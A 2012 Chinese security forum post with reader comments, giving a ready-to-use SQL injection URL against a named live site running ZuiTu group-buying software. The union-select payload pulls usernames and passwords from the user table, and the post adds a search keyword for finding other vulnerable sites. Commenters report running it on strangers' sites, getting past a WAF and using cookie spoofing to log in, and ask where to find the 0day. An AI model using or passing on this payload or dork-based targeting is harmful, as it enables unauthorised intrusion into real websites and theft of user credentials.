最土团购注入好久的了

2012-12-21 16:52:06 20 xiaoxiaoabc 4747

直接来代码，你们就知道了。代码不分析了。，今天好累呀！

[url]http://tao.mphone.cc/api/call.php?action=query&num=j8g'%29/[/url]**/union/**/select/**/1,2,3,concat(0x7e,0x27,username,0x7e,0x27,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23

关键字百度 Powered by ZuiTu software.

类别 Web安全

关于作者

xiaoxiaoabc68篇文章777篇回复

xiaoxiaoabc

评论20次

要评论？请先登录或注册

20楼

杨淑璟
2018-5-7 18:39

这波简单粗暴的操作贼溜

回复|@ta|踩(0)|顶(0)
19楼

qiaobochao
2012-12-30 16:07

正好遇到个测试下

回复|@ta|踩(0)|顶(0)
18楼

hualuowusheng
2012-12-30 14:35

这算是漏点不~

回复|@ta|踩(0)|顶(0)
17楼

jkrow
2012-12-27 15:02

测试了一个站，成功，安全狗拦的from关键字，密码没破出来，直接cookie欺骗进前台了，本想pass掉密码后台二次登录，但现在貌似加了先输入前台密码功能，还在研究中……

回复|@ta|踩(0)|顶(0)
16楼

panda
2012-12-26 16:01

这个在创宇的微博上看到过

回复|@ta|踩(0)|顶(0)
15楼

奔跑的馒头
2012-12-22 19:55

给力。收藏了

回复|@ta|踩(0)|顶(0)
14楼

ahkxhyl
2012-12-22 11:09

xi望多一点代码分析类的文章谢谢分享！！

回复|@ta|踩(0)|顶(0)
13楼

咖啡000
2012-12-22 10:47

测试失败

回复|@ta|踩(0)|顶(0)
12楼

xiaolong520
2012-12-21 21:55

很简单的结果！

回复|@ta|踩(0)|顶(0)
11楼

al277
2012-12-21 21:48

一般都改后台了

回复|@ta|踩(0)|顶(0)
10楼

xiaoxiaoabc
2012-12-21 20:09

我也不知道，我就分析了下，结果就出来了。。。

回复|@ta|踩(0)|顶(0)
9楼

该隐
2012-12-21 19:52

貌似没xi望，lz另辟蹊径吧，或许其他方法可以突破，社工啥的

回复|@ta|踩(0)|顶(0)
8楼

edward
2012-12-21 19:44

可以

回复|@ta|踩(0)|顶(0)
7楼

bba56k
2012-12-21 19:31

这样文章不错攻防兼备啊

回复|@ta|踩(0)|顶(0)
6楼

再见江南
2012-12-21 19:23

刚试试了十多个站，不行哦

回复|@ta|踩(0)|顶(0)
5楼

k@i
2012-12-21 18:12

url漏点了。

回复|@ta|踩(0)|顶(0)
4楼

clannad
2012-12-21 18:00

试了一个，被安全狗提示

回复|@ta|踩(0)|顶(0)
3楼

evildns
2012-12-21 17:34

好给力啊，刚好我客户有用，测试秒之赶快修复

回复|@ta|踩(0)|顶(0)
2楼

唐门三少
2012-12-21 17:24

忘记了，原来在哪看到过这个cms的0day，90和t00ls都翻了下，没有找到，应该就在这两个论坛了，楼主知道不？给个url吧

回复|@ta|踩(0)|顶(0)
1楼

ty4z2008
2012-12-21 17:22

之前在微博上面看到了创宇发了一个

回复|@ta|踩(0)|顶(0)